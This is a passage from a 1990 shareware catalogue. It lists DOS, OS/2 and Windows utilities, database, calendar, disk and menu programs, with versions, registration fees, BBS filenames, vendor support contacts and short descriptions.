track of holidays when + rates go down. Analyzes uploads & downloads, which includes + the cost to transfer files. Reports can be restricted to last + call (even if it's still in progress) or to a specific phone + number. Maintains Qmodem .LOG files to keep them as small as + possible. Phone-rate files comply with the powerful new Call + Data Standard. + + Program: QFE + Version: 4.03 (03/05/90) + Registration fee: $15 + BBS filename: QFE_403.* + User support: current disk mailed to registered users; support on + CIS, GEnie, InterLink echo; voice support for registered users + Description: + QFE is THE Qmodem .FON processor, enabling true fullscreen + multi-file editing, sorting, and general processing of your + .FON files, including cut & paste between files, mass copy of + entries (or individual fields) over a marked block, etc. Full + "context-sensitive" help. Undo limited only by RAM. This is the + full version, unlimited in any way. + + -- page 21 -- + + + + Program: STARDIAL + Version: 4.00 + Registration fee: $20.00 + BBS filename: STARDIAL.* + User support: Current disk mailed out;Email/USMail support + Registration entitles free upgrades for one year + Description: + STARDIAL is a standalone autodialer for the Tymnet/Starlink + service. Automatic queue redialing from a dialing directory of + 200 outdial/BBS combinations. ASCII file capture for easy + message handling.Has eight internal file transfer protocols. + Can install up to 3 externals. Context-sensitive help. Mouse + support. Desqview aware. Version 4.00 + + Program: TAPLEX + Version: 1.2 + Registration fee: $0 + BBS filename: TAPLX120.* + User support: support provided on CompuServe TAPCIS forum LIB 2 + and EPLEX to 73267,333; also by phone and mail. + Description: + TAPLEX is a TAPCIS utility which helps you organize and + maintain your EasyPlex correspondence. It merges messages from + EASYPLEX.MSG and EASYPLEX.SAV in time and date order into + different message files based on user name and PPN, so, for + example, you can have all your John Smith messages in JOHN.M + and all your Myrtle Jones messages in MYRTLE.M. Version 1.2 + adds: merge EASYPLEX into one file; prompt on every message. + Auth: Tracey Siesser, member of ASP. + + Program: TAPMARK + Version: 1.43 + Registration fee: $0, enhanced non-shareware version is $25. + BBS filename: TAPMK143.* + User support: support provided on CompuServe TAPCIS forum LIB 2 + and EPLEX to [76164,237]; also by phone and mail. + Description: + TAPMARK, the most popular TAPCIS add-on utility, intelligently + marks message threads to be downloaded from CompuServe. (It is + used in place of the TAPCIS "M" command.) It remembers which + threads you've previously read; identifies threads with + messages to you; allows you to specify areas of interest and + disinterest. If used properly, TAPMARK can save you gobs of + time and enhance your enjoyment of CIS and TAPCIS. This is + version 1.43. Auth: Jim Korenthal, member of ASP. + + -- page 22 -- + + + + Program: TTIME + Version: 1.1 (03/01/90) + Registration fee: $10 + BBS filename: TTIME11.ARC + User support: Support is currently offered via U.S. Mail, or on + CIS at User ID listed. Future plans include dedicated BBS. + Description: + Want to know how long that file transfer is going to take + BEFORE you start it? TTIME will provide best-guess estimates + for file transfers via XMODEM, YMODEM and CompuServe B/B+, by + file name (Uploads) or file size (Downloads). Can be run from + your communications program as a shell or external program. + Offers both prompted and command line operation. + + Program: XRS + Version: 3.40 (07/17/90) + Registration fee: $20.00 + BBS filename: XRS3*.ZIP (multiple files) + User support: Support BBS at (803) 556-7485. Compuserve users + address questions to [76666,1512]. Support conference on + FidoNet systems using the "QMX_XRS" echomail conference. + Description: + XRS is an offline reader/editor for TComm/Net, QuickBBS, Opus, + RemoteAccess, Maximus and XBBS bulletin board users. XRS uses + an intuitive user interface with automatic detection of video + capabilities, scrolling selection lists, hot-key configuration + and full mouse support. Allows users to select, compress and + download messages from any BBS supporting the program, both + freeing up the BBS for more callers, and saving time and money + for long-distance callers. Full-screen editor built in. + + + Databases + + Program: DAYO INDEX + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOXE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO INDEX is a program designed to manage the indexing of the + DAYO databases. DAYO applications all have multiple indexes, + and because it is recommended that they be reindexed at least + once daily, DAYO Index was created to simplify this process. + + -- page 23 -- + + + + Program: DAYO Inventory + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOIE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO Inventory is a Multiuser Inventory Control, Purchasing, + and Vendor Maintenance application. Use DAYO Inventory to + create and maintain an inventory of any product. Create and + print purchase orders on a standard printer or a Hewlett + Packard LaserJet (tm). Receive purchase orders into inventory, + with the option of printing receivers, and inventory price + labels. Other features include Reports, Labels, Lists, a Graph + and a Simple Database Management System. + + Program: DAYO Look Up + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOLE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO Look Up is a routine for DAYO users to view data from any + DAYO database or dBase (tm) compatible database (.DBF). No + editing is allowed. This provides a 'safe' tool for users that + do not have the need to make changes to the databases. Has + multi-level passwords. + + Program: DAYO PASSWORDS + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOIDE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO PASSWORDS provide DAYO Business Application users with a + system of database security through the use of passwords. Its + use is optional, but recommended in areas where more than one + person has access to the data. + + -- page 24 -- + + + + Program: DAYO UPDATE + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOUE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO UPDATE is a program created to update and convert earlier + versions of DAYO databases and memory files. * It is required + when attempting to upgrade any existing DAYO module. + + Program: FLAG + Version: 6.1.9.2 (07/24/90) + Registration fee: $24.95 + BBS filename: FLAG6192.ZIP + User support: most recent version/release sent. FREE upgrades for + 1yr following registration. Email/Voice/USPS support. + Description: + Don't let duplicate records jeapordize the integrity of your + dBASE 3+ (or compatible) data base. FLAG will find Exact, + Probable, and Possible duplicates. Optionally eliminate + exacts. FLAG offers the most extensive user defined checking + available. Options to ignore case, spaces, punctuation. Create + reports. You decide what fields, where to start, and how much + of each field to check. User defined filter for enhanced + checking. + + Program: PC-File + Version: 5.0 (1/15/90) + Registration fee: $129.95 + BBS filename: PCF5_1.ZIP PCF5_2.ZIP PCF5_3.ZIP + User support: Current disks are sent, with 400+ page printed + manual. Automatic notification of updates. Free technical + support via Compuserve or ButtonWare's BBS. Paid voice support + available via a (900) number. + Description: + PC-File is the easiest to use full function "flat file" + database available. It includes letter-writing with mail merge, + business graphing of data, a powerful report writer, macros, + context sensitive help, relational retrieve from other + databases, works directly on dBASE files. New version 5.0 + features: mouse support; telephone autodialer with phone call + logging; ten levels of report subtotals; multi-screen data + entry forms; more sophisticated searching and indexing; 128 + fields; more. + + -- page 25 -- + + + + Program: Personal Asset Register (PAR) + Version: 1.1 (01/01/89) + Registration fee: $37 + BBS filename: PAR11.EXE + User support: Micro System Solutions on CIS PPN 76060,102 or by + phone 1(303)795-7653 (9-5 MST M-F), credit card order by EPlex + or toll free 1(800)421-1789. 5417 S. Cimarron Rd. Littleton CO + 80123 + Description: + User defined mini database formatted to allow inventories of + your data YOUR way. Redefine any screen, any printout. Provide + copies of inventories to insurance companies, estate lawyers. + Comes complete with definitions for 10 different inventories. + Shareware. Self-extracting (LZH format) + + Program: PopDBF + Version: 3.6 (02/08/90) + Registration fee: $35 + BBS filename: POPDBFxx.EXE or POPDBFxx.ZIP ("xx" is version) + User support: Compuserve, Mail, and Telephone. First upgrade is + free. Additional upgrades are only $5. + Description: + PopDBF is a memory resident program (can be run in non-resident + mode) which provides INSTANT access to dBASEIII+ and compatible + database files. It uses less than 33K when installed in memory + and can be uninstalled. Features include: easy file selection, + browse, append/edit, view structure, print structure/data, FAST + search (record wide or field(s) specific), context sensitive + help. + + Program: SANDDS MOVIE GUIDE + Version: 2.0 (07/08/90) + Registration fee: $29.95 + BBS filename: MOVIE2.ZIP + User support: Current disk is mailed to customer. Disk with a + Data base of over 900 movies and PCX pictures are sent to the + customer. Telephone and written support by SANDD. + Description: + Relational movie data base featuring PCX picture support. + Unique actor director lookup, displays film history of the + stars. Packed with almost 200 movies and 900 more apon regis- + tration. Simple pull down menus with mouse support make access + ing your data a snap. Many fields with user defined series + make your data base flexible. Written in Pascal and Assembler. + + -- page 26 -- + + + + Program: SOFF BALLS + Version: 2.1 (01/05/90)") + Registration fee: $25 + BBS filename: SOFFBALL.* + User support: Current disk is mailed unless they specify they + have current version. Copy of 1989 Stats and Press Release for + STEELE'S (America's number one softball team). Notification of + future upgrades. + Description: + Softball/Baseball record-keeping system. Keeps records for up + to 10 teams. Tracks TAB-OAB-H-R-D-T-HR-SAC-BB-SO-RBI-SA-BA. + Computes stats hundreds of ways (i.e. all games, league games, + tournament games, game 7, McFarland Tournament, last 10 games). + Displays and prints reports. Loaded with STEELE'S (America's + number one softball team) 1989 NSA National Championship Games. + On-line documentation. Allows color customizing of screens. + VERY EASY TO USE. + + Program: Videocat + Version: 7.0. (10/20/89) + Registration fee: $20 + BBS filename: VCAT70.EXE + User support: current disk is mailed out; mail support; email + support via CompuServe; registration good for all future + versions (nominal shipping charge after first update); C source + code available. + Description: + "Videocat" is a fully featured program for cataloging + videocassettes; designed for serious collectors and large + collections. Both fixed information fields and free-form text + comment area in each record. Some categories can be custom + configured by the user. Add, change, delete, search functions; + screen or printer output options; label printing; statistical + reports. Family API runs under either DOS or OS/2. Memory- + intensive, may conflict with some TSR's. + + Program: VINO:FILE Cellar Master + Version: V2.13 (06/12/90) + Registration fee: $25 + BBS filename: VINOFILE.* + User support: Current disk and printed manual are mailed. Support + is available on Compuserve, by mail and by phone. + Description: + VINO:FILE Cellar Master manages your wine cellar records and + tasting notes on IBM computers (& compatibles). Analyze your + cellar - by variety, year, origin, peak drinking period, + location - identify future purchases, print reports. Nice user + interface. Includes Cross Reference facility, help screens, on- + disk manual (over 100 pages!) and sample files. + + -- page 27 -- + + + + Program: WORKBASE [***] + Version: 3.0 (08/??/90) + Registration fee: $49 + BBS filename: WORKBASE.ZIP + User support: Mail or phone, nesletter + Description: + Designed with the professional database developer (especially + Clipper users) in mind, WORKBASE replaces the dot prompt with + over 80 "dBASE language" commands & over 110 functions. Create + a DBF; append, edit & browse; restore from & save to MEM files; + display memory; display & modify structure; DO a PRG file. + Anyone using dBASE-compatible data files will love this + powerful utility. "Everything you need to create and manipulate + dBase III data, memo and index files is here without the $700 + price tag." -- Public Brand Software. + + + Desktop applications + + Program: Calendar Keeper + Reason for version: This is the initial IBM compatible Shareware + release of Calendar Keeper. The prior version of this program + was CALENDAR.BAS written for the Tandy Model 4. + Registration Fee: $20 + BBS Filename(s): CK-21B.* + User Support: Current Disk mailed with Registration; phone, mail, + and BBS support; registered users notified of all upgrades. + Description: + Calendar Keeper is a Calendar DataBase program which maintains + up to 10 separate Calendar DataBases and can print them to + Printer, File, or Screen. Functions include View/Edit/Delete/ + Scan/Add/Draw of data which can be stored as 'One-time' or + 'Permanent' events. Permanent events can be recurring-yearly or + fixed-date events. This is an easy to use calendar system + designed for individuals, clubs, or anyone who has trouble + keeping track of dates and miscellaneous appointments. + + Program: DARN! [***] + Version: 3.0 (07/12/90) + BBS filename: DARN3.ZIP + User support: Registered users recieve a copy of the latest + version of DARN! on disk with a serial number entitling them to + unlimited technical support + Description: + DARN! Don't Forget! Version 3 is for absent minded people (like + me) who need help remembering birthdays, anniversaries, tax + payments, any event that occurs on the same day each year. It + loads via your autoexec.bat file once a day (or each time you + boot -- your choice). DARN! is NOT a TSR, so it takes zero + memory from your other applications. Many features, easy to + use. + + -- page 28 -- + + + + Program: Don't Forget + Version: 1.50D (09/04/89) + Registration fee: $15.00 + BBS filename: DF150D.* + User support: Diskette with current or next major revision free + in U.S. Three months support by mail. + Description: + "Don't Forget" displays reminder messages on specified dates. + Create "message" files for different persons or purposes with + a text editor specifying week-days or dates on which messages + will appear. Supports wild-card dates, shows messages "missed" + if you did not run the program on that day. Run at any time or + from AUTOEXEC.BAT. For IBM or compatibles. + + Program: MORSOFT CALCULATOR + Version: 2.0 + Registration fee: $15 + BBS Filename: MORCALC.ZIP + User support: Latest release mailed out, no cost voice support, + notification of new releases + Description: + Calculate in style with the MORSOFT CALCULATOR. A business + calculator/adding machine with the functions of add, subtract, + multiply, percent, divide and trigonometric functions. Also a + memory constant feature and sub and overall totals. All + operations may be perfomred in decimal or HEX. The main + advantage however is the 1,000 entry "paper tape" that is + displayed on the screen and may be scrolled forward or back, + changed, printed and may contain several subtotals. + + Program: PAL + Version: 2.1 (7/9/90) + Registration fee: $35 + BBS filename: PAL21.ZIP + User support: Support via PAL BBS at 914-762-8055 and via RIME + BBS network. + Description: + PAL, the Personal Appointment Locator, is a flexible + appointment calendar, scheduler and to-do list, permitting + automatically repeating appointments and alarms. Shows popular + and religious holidays. Any alarm can be turned into a timed + event on your computer, with PAL's "invisible hand" initiating + any series of keystrokes that you choose, even though you may + be continents away at the moment. CIS has the program in three + files: PAL21A.ZIP, PAL21B.ZIP and PAL21C.ZIP. + + -- page 29 -- + + + + Program: REMIND! + Version: 6.0 (02/24/90) + Registration fee: $24.95 + BBS filename: REMINDS.* + User support: Support available by phone, electronic mail, or + postal mail. Inexpensive upgrades for purchasers. + Description: + Best daily reminder ("tickler") program ever. Understands days + of the week, annual, monthly, weekly, perennial dates, and + more. Never forget an appointment or birthday again! This + version is fully functional, and includes the complete manual. + There is No charge to use this version. Copyrights reserved. + + + Disk utilities + + Program: Baker's Dozen + Version: 1.0 + Registration fee: 59.95 + BBS filename: BAKDOZ.ARC in Compuserve PCVEN forum + User support: Telephone, Mail, FAX, ButtonNet (BBS), Compuserve + PCVEN. All support is free for one year following date of + purchase. PCVEN Compuserve support is free to everyone. + Description: + Baker's Dozen is a collection of 13+ useful utility programs, + including sideways printing; program to locate files and text + within a file; pop-up calendar; disk utility program to browse/ + edit FAT or any file; and more. BAKDOZ.ARC contains all of the + files found on the Baker's Dozen program disk. You must "un- + arc" the file before you can use Baker's Dozen. REQUIREMENTS: + IBM PC or compatible; 256K RAM; DOS 2.0 or higher; 2 floppies + or 1 hard disk. See BAKDOZ.INF for more information. + + Program: BOOT.SYS + Version: 1.10 (01/24/90) + Registration Fee: SFR 70 (about $45) + BBS filename: BOOT110.* + User support: current disk and nicely printed documentation; + email support (Internet, also thru CompuServe), mail support; + registration transferable to ALL future versions + Description: + BOOT.SYS makes it possible to display one or more menus at + boot-up time and to have different parts of CONFIG.SYS and/or + AUTOEXEC.BAT executed depending on which menu option(s) are + chosen. No more editing/renaming your start-up files and + rebooting. Up to 9 options per menu, up to 25 consecutive and/ + or nested menus. Uses 160 bytes of resident storage, no + conflicts or side-effects. + + -- page 30 -- + + + + Program: Browse/2 + Version: 1.2 (09/23/89) + Registration fee: $25 + BBS filename: BRW2_12.* + User support: Telephone support (weekdays 8:00 am-5:00 pm PST) + and on line support via CompuServe(72777,1556) and BIX(jwolf). + Current disk is mailed out and one free upgrade is provided. + Description: + With Browse/2 and the OS/2 Presentation Manager you can quickly + see the contents of your disk files. You can: + * View your files in ASCII or hexadecimal format + * Search for words or phrases and display them in context + * Set viewing options such as line numbers and display + font + * Select files for browsing with an interactive dialog + Browse/2 requires OS/2 Version 1.1 or 1.2. + + Program: Colorado Utilities Disk Manager (CUDM) + Version: 3.1.d (11/01/89) + Registration fee: $37 + BBS filename: CUDM31.EXE + User support: Micro System Solutions on CIS PPN 76060,102 or by + phone 1(303)795-7653 (9-5 MST M-F), credit card order by EPlex + or toll free 1(800)421-1789. 5417 S. Cimarron Rd. Littleton CO + 80123 + Description: + The BEST!! Disk Catalog System. Over 4000+ catalog entries. + Reads any drive A:-Z:; format (360K, 720K, 1.2M, 1.44M);ARC & + ZIP files. Any monitor. Prints standard lists, condensed + lists, covers, disk labels. File comments. Windows, menus. by + author - Fred Hill. Self-extracting (LZH format) + + Program: Colorado Utilities Duplicate File Manager (CUDUP) + Version: 1.3 (11/01/89) + Registration fee: $27 + BBS filename: CUDUP1.EXE + User support: Micro System Solutions on CIS PPN 76060,102 or by + phone 1(303)795-7653 (9-5 MST M-F), credit card order by EPlex + or toll free 1(800)421-1789. 5417 S. Cimarron Rd. Littleton CO + 80123 + Description: + Displays duplicate files on any drive, then allows you to list + or delete any duplicates including DOS, .ARC, .ZIP, .LZH, .ZOO + and more. Change colors & compression files to your needs. + COMPLETE TP5.x SOURCE CODE (minus TPro library) included with + registration. ASP Shareware. Self-extracting (LZH format). + + -- page 31 -- + + + + Program: DIREDIT + Version: 3.01 (11/28/89) + Registration fee: $20.00 + BBS filename: DIREDISH.* + User support: Latest version sent on disk to new Registrants. + Support on CIS, Bix, and by phone and U.S. Mail. Mailed + notification of significant bugs and major upgrades. Upgrades + available on disk. + Description: + DIREDIT V3.01 is a "Shareware" utility which allows you to + rearrange the order of files and sub-directory entries in a DOS + directory. As well as allowing you to sort the directory in the + standard ways, DIREDIT allows you to move individual files + around and/or specify an arbitrary sort order. V3.00 includes + support for almost all fixed and removable disks and for > 32 + Mb devices under DOS 4.0 & Compaq DOS 3.31. + + Program: DUP [***] + Version: 5.8 (09/??/90) + Registration fee: $25 + BBS filename: DUP58.EXE + User support: Bound manual, latest version, unlimited free phone + support, CIS membership, discounts on commercial products. + Description: + DUP speeds disk duplication. Master images are stored on hard + drive, then copies are produced at high speed. Multi-drive + operation, data compression, RAM buffering, disk serialization + and much more! Excellent user interface, full status screen. + Very powerful, yet easy to use! New version compatible with all + drive types and has faster copying. If you need to make + multiple disk copies, DUP makes it quick and easy. Self + extracting. + + Program: Easy Format + Version: 3.10 (04/16/90) + Registration fee: $40 + BBS filename: EASY31.* + User support: Current disk is mailed out. Support via CompuServe + Mail, U.S. Mail, and telephone. Free technical support to + registered users. Next version also shipped to registered + users automatically. + Description: + Easy Format 3.1 the fun floppy disk formatter. Supports all + common disk/drive sizes. Provides four testing methods, six + bad spot marking methods, continuous formatting even on two + drives of different sizes, custom boot messages, volume labels, + 80+ page User's Guide, and more. Three languages - English, + German and Spanish. Menu driven and fully customizable. Three + programs including a DESQview specific version for background + formatting. Shareware [ASP Member] + + -- page 32 -- + + + + Program: FD.EXE + Version: 1.3 (02/16/90) + Registration Fee: $17-23 + BBS filename: FD13.EXE + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + FD (1.3) Find any dir. with a minimum of typing, e.g. "FD db pr + a" to switch to "\dbase\programs\accounting" OR use the same + abbrv. format for COPYing or MOVEing files(wildcards!) to + another {drv:} \path; also overwrite, follow, and simulate + (test) modifiers. Verifies over-write if no modifier. Many + safeguards for your files. Self-exams for viruses. Self- + Extracting LZH archive. + + Program: FFOUR + Version: ?? (06/14/89) + Registration fee: $20 + BBS filename: FFOUR.* + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + FFOUR.ARC contains four small but powerful utilities. MOVE + (<2K) a full-featured move utility which even accepts + wildcards. TD (<1K) a smart replacement for CD. Transverse + dir's without typing! INKEY (<2K) a multi-featured BATch file + utility. HELP (<1K) a easily customizable command-line help + utility for ANY program. + + Program: HDTEST + Version: 4.84 (11/10/89) + Registration fee: $35.00 + BBS filename: HDTESTSH.* + User support: Latest version sent on disk to new Registrants. + Support on CIS, Bix, and by phone and U.S. Mail. Mailed + notification of significant bugs and major upgrades. Upgrades + available on disk. + Description: + Hard/floppy disk test utility. HDTEST V4.84 is the latest + "Shareware" version of a program that allows THOROUGH READ/ + WRITE testing of a hard (DOS partition(s) only) or floppy disk + without disturbing data on the disk. Data from a problem area + is moved to a known good area, and the disk's FAT and directory + entries are adjusted to preserve the structure of the file of + which it is a part. + + -- page 33 -- + + + + Program: MAXI Form + Version: 1.54a + Registration fee: $10 + BBS filename: MAXI154A.* + User support: current version is mailed with printed docs, voice + CompuServe and GEnie technical support, discount on Herne Data + Systems commercial software. + Description: + MAXI Form is a command line driven utility for use with DOS 3.2 + or later which can format floppy disks with up to 15% more user + space: 420k on a 360k disk, 800k on a 720k, 1.4 meg on a 1.2 + meg disk and 1.6 meg on a 1.44 meg disk. The disks are not + bootable, but are fully transparent to DOS (v3.2 or later) and + can be mixed interchangeably with normal DOS disks. Great to + pack a few extra bytes onto your floppies. Saves disk swaps + when backing up hard disks. Version 1.54a is the latest. ASP + shareware. + + Program: PC-IDENT, PC-INFO + Version: 2.06 + Registration fee: $15 + BBS filename: PC-206.COM + User support: current disk is mailed out; voice & CIS support; + registration good for all future versions + Description: + PC-INFO displays operating system & hardware configurations. + Especially useful when supporting multiple systems. PC-IDENT + reports copyright information found in ROM BIOS code, useful in + determining BIOS source and clone manufacturers. All video + adapter types are recognized and handled automatically. Full + support for PC/MS-DOS 4.xx disk partitions >32 Mb. PC/PS-2 & + compatibles supported. Self extracting archive. + + Program: XDIR [***] + Version: 3.02 + Registration fee: $25 + BBS filename: XDIR302.* + User support: Current disk is mailed out. Voice support; CIS + support; notification of upgrades. + Description: + XDIR is a commented directory utility. It displays a 65 + character comment for each file in the DIR display. You can + copy, rename and move files, carrying the comment line along. + Version 3.0x can RUN programs from the directory list and + supports executable extensions. With proper setup, it will + recognize the appropriate application to call for a given file + extension. Ver. 3.02, uploaded by author. + + -- page 34 -- + + + + DOS menus + + Program: Anarkey + Version: 2.00 + Registration fee: $25, includes copy of NEXT release + BBS filename: ANARKEY2.* + User support: Registered users receive the next release free. + Subsequent versions may be purchased for a minimal fee. Support + is via US mail, CIS [73507,2272] and UseNet (src@cup.portal.com + or !sun!cup.portal.com!src). + Description: + ANARKEY 2.00 is a DOS command-line editor that supports: 1) + command line retrieval (enter one or more chars and ANARKEY + will complete the rest of the line for you), 2) aliases, 3) + filename completion, 4) reconfigurable keyboard, 5) environment + variable editing, 6) 255-char line, 7) multiple commands per + line and 8) much more! Written entirely in assembly language + for speed and memory efficiency. Default installation requires + less than 7400 bytes. + + Program: Applets + Version: 1.1 + Registration fee: $20 (license only) to $35 (w/disk and manual) + BBS filename: APLT11.ARC + User support: Compuserve support at 72360,2335; Voice support; + Mail support; Registration good for all future versions. 90- + day money back gaureentee. + Description: + Applets are a collection of tiny applications for Microsoft + Windows. They are primarily designed to operate with Windows + menuing programs, such as Command Post, which allow you to + initiate a series of applications from a single menu selection. + These tiny applications from include: FILE Applets: copy, + move, rename, delete. WINDOW Applets: arrange, place, hide, + show, zoom, iconize. OTHER Applets: say, beep, saybeep. + + Program: Bmenu [***] + Version: 5.4 (02/23/90) + Registration fee: $10 + BBS filename: BMENU54.ZIP + User support: current disk is mailed out; voice support after + initial mail, CompuServe or USENET contact. Custom versions + available for use on installation disks, etc. Registration good + for all future versions + Description: + Bmenu v5.4 - Batch Menu System - Provides pop-up menus within a + batch file of any size or position. More complicated menus are + possible by using @files to read in menu arguments, and several + menus can be read from a single @file. Even the batch file can + be used a definition file. Can also read entire menu from the + command line. After the user makes the choice, Bmenu sets the + errorlevel to the choice number. Very flexible for networks as + a user interface, or on installation disks for user input. + + -- page 35 -- + + + + Program: Command Post + Version: 6.2B + Registration fee: $20 (license only) to $35 (w/disk and manual) + BBS filename: CP-62B.ARC + User support: Compuserve support at 72360,2335; Voice support; + Mail support; Registration good for all future versions. 90- + day money back gaureentee. + Description: + Command Post is a shell for Microsoft Windows. Command Post + allows users to easily add menu items (and their related + dropdown menus) to the Windows MS-DOS Executive window. Command + Post also provides file management facilities, a directory + tree, screen blanker, window locator, window arranger, and + more! + + Program: DAYO MENU + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOME.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO MENU is a simple DOS level menu system for use with the + DAYO line of Business Applications. It consists of a Qbasic + (tm) menu program and a DOS batch file that you can modify/ + edit. + + Program: DIRECTMAINT + Version: 2.0 + Registration fee: $20 + BBS Filename: DIRCMAIN.ZIP + User support: Latest release mailed out, no cost voice support, + notification of new releases + Description: + TAME YOUR HARDDISK and forget DOS with DIRECTMAINT the + directory and file manager. Formatted directory and file + display, point & shoot menus for copy, move, compare, erase + all, selected or marked files. Change file names, dates, times, + attributes. Run programs with the stroke of a key. Easily + locate & erase inactive & duplicate files to save precious disk + space. View two disks or two directories on same disk on same + screen at same time, find any file on any disk quickly, and + much, much more. + + -- page 36 -- + + + + Program: Director + Version: 4.0 + Registration fee: $30 + BBS filename: DIR4P.EXE + User support: Registered users get telephone support at + 415-453-9779. I answer registered and non registered users + queries on CIS daily. CIS# 71320,1277. + Description: + DIRECTOR version 4.0. Very fast, very well designed hard disk + manager and shell. Complete hard disk menu. Full featured + Shell copies, moves deletes marked files and directories. You + can mark and copy and move whole branches of the directory + tree. View all the files on hard disk or disks. Shows + duplicates. Easy to use with mouse or keyboard. Abridged + documentation. Complete docs in DIR4P.COM. + + Program: Directory Freedom + Version: 3.50a (04/16/90) + Registration fee: $20 + BBS filename: DF350A.ZIP + User support: Phone support; BBS support; Upgrade disks and + printed manuals available (manual is desktop publishing + quality); 30 day unconditional money-back guarantee + Description: + Offers users a fast, compact alternative to DOS Shells which + provides 1) selective file and directory operations; 2) a + scrollable environment for examining files and directories; 3) + user-defined keys which can operate upon highlighted files + (e.g. by defining an editor). All this in a program which + takes less than 12KB since it is written in assembler! Easily + customized through an external configuration program. A "look- + and-feel" similar to PC Mag's DR, but does much more. + + Program: Easy Access + Version: 6.0a (05/21/90) + Registration fee: $25 + BBS filename: EZ60A.* + User support: For problems or questions you may contact TengWare + Enterprises by Compuserve easyplex mail, phone, or US Mail. Our + policy is to answer any messages within 24 hours. + Description: + Easy Access 6.0a - Professional Menu System for all PC & MS-DOS + Computers. Simple enough for the novice yet with the features + required by the most demanding user. Features: Simple set up & + maintenance. User defined colors & headings. Calendar & + Reminder subsystem. Optional user logon with usage logging. 26 + options per menu with unlimited submenus. International date + formats. Point & Shoot with mouse support. Not memory resident. + Has the professional look required in the office environment. + + -- page 37 -- + + + + Program: HDM IV (Hard Disk Menu) + Version: 1.20 (07/28/89) + Registration fee: $50 + BBS filename: HDM4V120.ZIP + User support: Current registered disk, printed and bound user, + additional programs and utilities mailed out. Tech support via. + U.S. mail, phone, or CompuServe. Upgrade notices sent out. Beta + test versions available + Description: + Hard Disk Menu system for all PC/MS-DOS computers. Single key + to 10,000 entries. Run any DOS commands and programs in one + entry. Ability to prompt the user for input and set input + defaults. Full customization of colors, borders, cursor, mouse, + and windows. Works with monochrome, CGA, EGA, VGA, Hercules, + etc. Network compatible. Can set up menu and command passwords + with master override. Extensive on-line help. Screen saver, + phone dialer, timed execution, and much more. + + Program: PC SYSTEM MANAGER + Version: 2.0 + Registration fee: $20 + BBS Filename: PCSMINS1.ZIP & PCSMINS2.ZIP + User support: Latest release mailed out, no cost voice support, + notification of new releases + Description: + PC SYSTEM MANAGER the master menuing/submenuing system with all + the bells and whistles. Up to 32,000 menus and program + selections, customized run time help, customized command line + replaceable parameter prompts, individual userid logon, time + usage tracking with 4 detail and summary reports, password + protection and automatic job starting based on time & date or + day of week. This is file 1 of 2, also download PCSM2.ZIP, file + 2 of 2. + + + DOS utilities + + Program: BATUTIL & STACKEY + Version: BATUTIL 1.0/STACKEY 3.0 + Registration fee: $39 + BBS filename: ?? + User support: Ctrlalt Associates has section 12 on the PCVENA + forum of Compuserve; orders from Support Group (Visa/MC/etc) + P.O. Box 130 McHenry, MD 21541 1 (800) 872-4768; CIS orders + 74020,10 + Description: + STACKEY is a keyboard stuffer with natural syntax (F1 is F1) + and lots of bells and whistles: hotkey, shift masks, scans + Batutil is a batch file enhancer as a high order language; pop + up a menu in a one line command: menus, user input, colors, + large characters (BIGECHO), etc. Together they can be used to + automate much of your computing. Includes on disk manual of + over 200 pages and printed manual with registration..Registered + users get free Compuserve signup and $15 credit. + + -- page 38 -- + + + + Program: BOOT.SYS + Version: 1.21 (05/09/90) + Registration fee: $34 + BBS filename: BOOT121.* + User support: current disk, printed and bound manual; email + (CompuServe [73237,3556], Internet) and mail support; + registration transferable to ALL future shareware versions + Description: + BOOT.SYS makes it possible to display one or more menus at + boot-up time and to have different parts of CONFIG.SYS and/or + AUTOEXEC.BAT executed, depending on which menu option(s) are + chosen. No more editing/renaming your start-up files and + rebooting. Up to 9 options per menu, up to 25 consecutive and/ + or nested menus. Easy installation, detailed examples for every + level of sophistication. + + Program: CAPBUF + Version: v1.3 (11/19/89) + Registration fee: $15 + BBS filename: CAPBUF.ARC + User support: Unlimited CIS email support for registered users. + Send email to 76703,3046. + Description: + CAPBUF is a memory resident (TSR) program that lets you capture + any text screen and save it for later processing or printing. + It is quite useful for programs that do not otherwise provide + means of printing their results. Use it for intermediate + results of games, or collecting copies of messages while on a + bulletin board. (mono or graphics) + + Program: FILE PATCH + Version: 2.0 + Registration fee: $15 + BBS Filename: FILEPATC.ZIP + User support: Latest release mailed out, no cost voice support, + notification of new releases + Description: + FILE PATCH is an excellent file manipulation program providing + the ability at the byte level, and in ASCII or HEX, for on + screen viewing, dumping to the printer, modifying, creating, or + extracting all or portions of any file up to 10 megabytes in + size. Easy to use and powerful. A must for programmers, + Information Centers, PC consultants, etc. + + -- page 39 -- + + + + Program: Newkey + Version: 5.2 + Registration fee: $43 + BBS filename: Newkey.arc + User support: Registered users receive current version and + printed manual. Voice, mail, and CIS support. + Description: + Newkey is a keyboard macro processor which, besides allowing + you to automate repetitive command sequences, provides a + shorthand mode, display macros, menu macros, screen saver, + extended keyboard buffer, cursor speedup without overrun, cut & + paste, a full-featured macro editor, support for EMS, and many + more features. + + Program: ONCEADAY + Version: 1.2 (09/10/89) + Registration fee: $20 + BBS filename: ONCEADAY.* + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 